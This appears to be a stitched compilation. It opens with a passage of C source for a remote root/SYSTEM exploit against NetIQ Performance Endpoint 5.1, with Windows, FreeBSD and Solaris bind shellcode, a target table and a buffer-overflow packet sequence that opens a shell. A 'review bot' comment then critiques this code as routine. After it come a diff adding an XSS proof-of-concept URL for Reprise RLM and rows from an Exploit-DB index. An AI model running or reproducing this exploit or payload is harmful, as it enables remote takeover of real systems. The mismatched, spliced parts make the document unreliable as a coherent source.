"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00" /* */
"\x00\x02" /* len < 0x80 */
"\x00\x03" /* len < 0x40 */
"\x00" /* len < 0x40 */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x41\x41\x41\x41\x41\x41" /* */
"\x00\x00\x00\x01" /* */
"\x00\x00\x00\x02" /* 218h */
"\x00" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x00" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf1_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 210h */
"\x00\x00\x00\x69" /* var_C */
"\x00\x02" /* */
"\x00\x00\x00\x69" /* var_C */
"\x00\x00\x00\x69" /* 218h */
"\x69" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x69" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 0A8h */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char cpkt_buf1[] =
"\x07"
"AAAA";
static char cpkt_buf2[] =
"\x38"
"\x00\x04"
"AAAA";
static char x86_evil_len[] =
"\x11\xc0"; /* adc eax, eax */
#define X86_NOP_BYTE 0x90 /* nop */
static char sparc_evil_len[] =
"\x10\x80\x00\x3c"; /* ba */
static char sparc_nop[] =
"\x01\x00\x00\x00"; /* nop */
static char hammer_buf[] =
"\x00\x25\x38"
"\x00\x20"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";
static char win32_x86_bind[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
"\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
"\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
"\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
"\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
"\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
"\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
"\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
"\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
"\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
"\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
"\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
"\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
"\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
"\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
"\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
"\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
"\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
"\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
"\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
"\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
"\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";
static char freebsd_x86_bind[] =
"\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42"
"\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0"
"\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a"
"\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80";
static char solaris_sparc_bind[] =
"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b"
"\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08"
"\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0"
"\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09"
"\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03"
"\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08"
"\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a"
"\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08"
"\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
"\x91\xd0\x20\x08";
static char solaris_x86_bind[] =
"\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52"
"\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6"
"\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0"
"\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51"
"\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4"
"\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91";
#define NUM_TARGETS 7
#define ARCH_X86 0
#define ARCH_SPARC 1
struct target_t
{
const char *name;
const char *zshell;
const int zshell_len;
const int zshell_pkt_len;
const int fp_indx;
const int fp_offset;
const int arch;
};
struct target_t targets[] = {
{ "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - FreeBSD (universal)",
freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
{ "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
{0}
};
static const char *quotes[] = {
" \"No executable code (like Java or Visual Basic) is sent. There is no way\n"
" to do something like 'run this command.' 100,000s of endpoints have been\n"
" installed worldwide without incident.\"",
" \"Endpoints do rigorous internal validation. For example, endpoints are not\n"
" susceptible to 'buffer overrun' attacks used by hackers.\""
};
static int verbose = 1; /* verbosity */
static int ppid, cpid; /* parent and child process id's */
static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);
static void
fatal (void)
{
kill (0, SIGKILL);
exit (EXIT_FAILURE);
}
static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
struct ifaddrs *ifa_head;
int result;
result = -1;
if (getifaddrs (&ifa_head) == 0)
{
struct ifaddrs *ifa_cur;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{
if (ifa_cur->ifa_addr->sa_family != AF_INET ||
!(ifa_cur->ifa_flags & IFF_UP))
continue;
if (ifa_cur->ifa_flags & IFF_LOOPBACK)
continue;
memcpy (ip_addr,
&((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
sizeof *ip_addr);
result = 0;
break;
}
}
freeifaddrs (ifa_head);
}
return (result);
}
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
perror ("send()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
perror ("recv()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv_str (int fd, char *dst, int len)
{
int n = sock_recv (fd, dst, len - 1);
dst[n] = '\0';
return (n);
}
static void
shellami (int fd)
{
int n;
fd_set rset;
char rbuf[1024];
while (1)
{
FD_ZERO (&rset);
FD_SET (fd, &rset);
FD_SET (STDIN_FILENO, &rset);
if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
{
perror ("select()");
fatal ();
}
if (FD_ISSET (fd, &rset))
{
if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
{
fprintf (stderr, "Connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
printf ("%s", rbuf);
fflush (stdout);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
{
rbuf[n] = '\0';
sock_send (fd, rbuf, n);
}
}
}
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
fflush (stdout);
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
perror ("connect()");
return (-1);
}
return (fd);
}
int
endpt_add_string (char *buf, char *str)
{
unsigned int str_len;
unsigned short str_lens;
assert (buf != NULL && str != NULL);
str_len = 2 + strlen (str) + 1;
str_lens = htons (str_len);
/* add the string length and copy, including NULL */
*((unsigned short *) buf) = str_lens;
memcpy (buf + 2, str, str_len - 2);
return (str_len);
}
char *
endpt_read_packet (int fd, char *buf)
{
unsigned short pkt_len;
int n;
n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len);
if (n < 2)
{
fprintf (stderr, "endpt_read_packet: failed reading length!\n");
return (NULL);
}
pkt_len = ntohs (pkt_len);
if (pkt_len > ENDPT_PKTMAX)
{
fprintf (stderr, "endpt_read_packet: invalid packet length!\n");
return (NULL);
}
n = sock_recv (fd, buf, pkt_len - 2);
if (n < pkt_len - 2)
{
fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len);
return (NULL);
}
return (buf);
}
char *
endpt_create_packet (char *buf, unsigned int len)
{
char *pkt_buf;
unsigned int pkt_len;
unsigned short pkt_lens;
assert (buf != NULL && len > 0);
assert (len <= UINT_MAX - 2);
assert (len <= ENDPT_PKTMAX - 2);
pkt_len = 2 + len;
pkt_buf = malloc (pkt_len * sizeof (char));
if (pkt_buf == NULL)
return (NULL);
pkt_lens = htons (pkt_len);
/* add the packet length and copy */
*((unsigned short *) pkt_buf) = pkt_lens;
memcpy (pkt_buf + 2, buf, len);
return (pkt_buf);
}
void
endpt_listen_child (char *thost, struct target_t *trgt)
{
struct sockaddr_in servaddr, cliaddr;
char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
unsigned int var_30_ptr;
int lfd, cfd, sfd, pid;
socklen_t clilen;
sleep (1);
pid = getpid ();
if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
fatal ();
}
memset (&servaddr, 0, sizeof servaddr);
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
servaddr.sin_port = htons (ENDPT_TCP_PORT);
if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0)
{
perror ("bind()");
fatal ();
}
if (listen (lfd, 2) < 0)
{
perror ("listen()");
fatal ();
}
clilen = sizeof cliaddr;
if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0)
{
perror ("accept()");
fatal ();
}
printf ("[child-%d] connection accepted from %s:%d\n",
pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port));
printf ("[child-%d] reading first packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] sending first reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1);
sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2);
free (pkt_ptr);
printf ("done\n");
printf ("[child-%d] reading second packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] reading third packet...", pid);
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done\n");
printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);
printf ("[child-%d] reading fourth packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] reading fifth packet...", pid);
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done\n");
printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);
printf ("[child-%d] sending second reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1);
sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2);
free (pkt_ptr);
printf ("done\n");
printf ("[child-%d] sending evil buffer...", pid);
ptr = pkt_buf;
if (trgt->arch == ARCH_X86)
{
memcpy (ptr, x86_evil_len, sizeof x86_evil_len);
ptr += sizeof x86_evil_len - 1;
memset (ptr, X86_NOP_BYTE, 0x11c0 - 2);
}
else if (trgt->arch == ARCH_SPARC)
{
int i;
for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1)
memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len);
for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1)
memcpy (ptr, sparc_nop, sizeof sparc_nop);
}
else
{
fprintf (stderr, "opps\n");
exit (EXIT_FAILURE);
}
memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1);
sock_send (cfd, pkt_buf, trgt->zshell_pkt_len);
printf ("done\n");
printf ("[child-%d] sending hammer buffer...", pid);
ptr = pkt_buf;
memcpy (ptr, hammer_buf, sizeof hammer_buf);
memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr);
if (trgt->arch == ARCH_SPARC)
var_30_ptr = ntohl (var_30_ptr);
var_30_ptr -= trgt->fp_offset - 0x08;
if (trgt->arch == ARCH_SPARC)
var_30_ptr = htonl (var_30_ptr);
memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr);
sock_send (cfd, pkt_buf, sizeof hammer_buf - 1);
printf ("done\n");
printf ("[child-%d] waiting for the shellcode to be executed...\n", pid);
sleep (3);
if ((sfd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (sfd);
}
sleep (1);
close (cfd);
}
void
endpt_parent (char *thost)
{
struct in_addr ip_addr;
char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
int fd;
get_localip_getifaddrs (&ip_addr.s_addr);
strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf);
ip_buf[sizeof ip_buf - 1] = '\0';
if (verbose)
fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf);
fflush (stdout);
printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT);
if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0)
fatal ();
printf ("done\n");
printf ("[parent-%d] building first packet...", ppid);
ptr = pkt_buf;
memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1);
ptr += sizeof ppkt_buf1 - 1;
/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);
memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end);
ptr += sizeof ppkt_buf1_end - 1;
pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done\n");
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);
printf ("[parent-%d] building second packet...", ppid);
ptr = pkt_buf;
memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2);
ptr += sizeof ppkt_buf2 - 1;
/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);
memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end);
ptr += sizeof ppkt_buf2_end - 1;
pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done\n");
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
printf ("[parent-%d] building third packet...done\n", ppid);
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);
sleep (2);
printf ("[parent-%d] closing socket...done\n", ppid);
close (fd);
}
int
main (int argc, char **argv)
{
struct target_t *trgt;
int i, cret;
printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc <= 2)
{
fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
for (i = 0; targets[i].name; i++)
fprintf (stderr, "\t%d) %s\n", i, targets[i].name);
fprintf (stderr, "\n");
exit (EXIT_SUCCESS);
}
if (atoi (argv[2]) >= NUM_TARGETS)
{
fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
exit (EXIT_SUCCESS);
}
trgt = &targets[atoi (argv[2])];
printf ("Target: %s\n\n", trgt->name);
srand (time (NULL));
printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]);
ppid = getpid ();
if ((cpid = fork ()) < 0)
{
perror ("fark()");
exit (EXIT_FAILURE);
}
else if (cpid == 0)
{
/* child */
endpt_listen_child (argv[1], trgt);
exit (EXIT_SUCCESS);
}
/* parent */
endpt_parent (argv[1]);
/* wait for child */
wait (&cret);
if (verbose)
fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret);
return (EXIT_SUCCESS);
}
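Review bot: `endpt_read_packet` rejects `pkt_len > ENDPT_PKTMAX` but has no lower bound, so a length field of 0 or 1 makes `pkt_len - 2` negative and that value is passed as `len` to `sock_recv`, where `recv` sees it as a huge `size_t`; widen the check to `if (pkt_len < 2 || pkt_len > ENDPT_PKTMAX)`. The same function also treats a short TCP read as a hard failure (`if (n < pkt_len - 2)`) instead of looping until the whole body has arrived, and `sock_recv` calls `exit()` on a socket error while its callers are written to handle a `NULL` return, so the two error paths are inconsistent. Minor: the `perror ("fark()")` and `fprintf (stderr, "opps\n")` strings look like typos for `fork()` and `oops`.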


@ -0,0 +1,16 @@
# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10
# Proof Of Concept:
http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E
Best Regards.
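Review bot: the header block has no `# Date:` line, and `# Author Company : reprisesoftware` names the vendor rather than the author's affiliation, duplicating `# Vendor home page`; either rename it to the author's organisation or drop it. The trailing `Best Regards.` after the proof of concept reads as e-mail sign-off residue and does not belong in the stored advisory.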


@ -1813,6 +1813,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48124,exploits/aspx/webapps/48124.txt,"DotNetNuke 9.5 - Persistent Cross-Site Scripting",2020-02-24,"Sajjad Pourali",webapps,aspx,,2020-02-24,2020-02-24,0,,,,,http://www.exploit-db.comDNN_Platform_9.5.0_Install.zip,
43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,,2017-12-27,2017-12-28,0,,,,,,
45577,exploits/aspx/webapps/45577.txt,"Ektron CMS 9.20 SP2 - Improper Access Restrictions",2018-10-10,alt3kx,webapps,aspx,,2018-10-10,2018-10-10,0,CVE-2018-12596,,,,,
51200,exploits/aspx/webapps/51200.txt,"ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)",2023-04-01,"Rob_ CTRL Group",webapps,aspx,,2023-04-01,2023-04-01,0,CVE-2022-35543,,,,,
44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,,2018-06-04,2018-06-05,0,CVE-2018-11628,,,,,
49508,exploits/aspx/webapps/49508.txt,"H8 SSRMS - 'id' IDOR",2021-02-01,"Mohammed Farhan",webapps,aspx,,2021-02-01,2021-02-01,0,,,,,,
42687,exploits/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,aspx,,2017-09-13,2017-09-13,0,,,,,,
@ -3624,6 +3625,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41895,exploits/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,remote,hardware,,2017-04-19,2017-04-19,1,,"Command Injection",,,,https://github.com/rapid7/metasploit-framework/blob/3b38d0d9005255a8a06522bd0505eeab95aace5a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
38663,exploits/hardware/remote/38663.txt,"Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",remote,hardware,,2015-11-10,2017-11-10,0,OSVDB-130098,,,,,
9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware,,2009-08-23,,1,OSVDB-56875,,,,,
51190,exploits/hardware/remote/51190.txt,"Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion",2023-04-01,LiquidWorm,remote,hardware,,2023-04-01,2023-04-01,0,,,,,,
19538,exploits/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],remote,hardware,,1999-10-05,2012-07-02,1,CVE-1999-0791;OSVDB-1100,,,,,https://www.securityfocus.com/bid/695/info
27706,exploits/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",remote,hardware,,2013-08-19,2013-08-19,0,CVE-2013-0526;OSVDB-96389,,,,,
44048,exploits/hardware/remote/44048.md,"Ichano AtHome IP Cameras - Multiple Vulnerabilities",2017-12-19,SecuriTeam,remote,hardware,,2018-02-15,2018-02-15,0,CVE-2017-17761,,,,,https://blogs.securiteam.com/index.php/archives/3576
@ -3764,6 +3766,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware,,2017-02-03,2017-02-03,0,,,,,,
19444,exploits/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 - Command Execution",1999-08-05,"Stefan Lauda",remote,hardware,,1999-08-05,2017-11-15,1,CVE-1999-0913;OSVDB-47,,,,,https://www.securityfocus.com/bid/564/info
9658,exploits/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",remote,hardware,,2009-09-13,,1,,,,,,
51195,exploits/hardware/remote/51195.py,"Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Yerodin Richards",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-44149,,,,,
25966,exploits/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",remote,hardware,,2005-07-12,2013-06-05,1,CVE-2005-2277;OSVDB-17853,,,,,https://www.securityfocus.com/bid/14232/info
1081,exploits/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client",2005-07-03,"Kevin Finisterre",remote,hardware,,2005-07-02,,1,OSVDB-17852;CVE-2005-2250,,,,,
22533,exploits/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",remote,hardware,,2003-04-24,2012-11-07,1,,,,,,https://www.securityfocus.com/bid/7426/info
@ -3888,6 +3891,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware,,2013-04-24,2015-10-19,1,CVE-2013-2645;OSVDB-92547,,,,,https://www.securityfocus.com/bid/59442/info
38308,exploits/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",remote,hardware,,2013-02-08,2016-09-12,1,,,,,,https://www.securityfocus.com/bid/57877/info
36945,exploits/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' HTML Injection",2012-03-12,l20ot,remote,hardware,,2012-03-12,2015-05-08,1,OSVDB-80038,,,,,https://www.securityfocus.com/bid/52424/info
51192,exploits/hardware/remote/51192.py,"TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Tobias Müller",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-48194,,,,,
